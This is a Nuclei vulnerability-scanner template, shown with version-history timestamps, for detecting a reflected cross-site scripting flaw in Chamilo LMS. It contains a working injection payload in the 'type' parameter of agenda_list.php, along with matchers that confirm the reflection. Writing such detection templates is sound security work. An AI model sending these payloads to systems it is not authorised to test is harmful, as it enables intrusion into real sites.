nuclei-templates/vulnerabilities/other/chamilo-lms-xss.yaml

29 lines
785 B
YAML
Raw Normal View History

2021-02-01 20:54:21 +00:00
id: chamilo-lms-xss
info:
name: Chamilo LMS Cross Site Scripting
author: geeknik
severity: medium
description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/
tags: xss,chamilo
2021-02-01 20:54:21 +00:00
requests:
- method: GET
path:
2021-02-03 11:28:43 +00:00
- '{{BaseURL}}/chamilo/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1'
- '{{BaseURL}}/main/calendar/agenda_list.php?type=x"%20onmouseover=xss(0x01CE61)%20x="#collapse-personal_1'
2021-02-01 20:54:21 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onmouseover%3dxss(0x01CE61)"
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"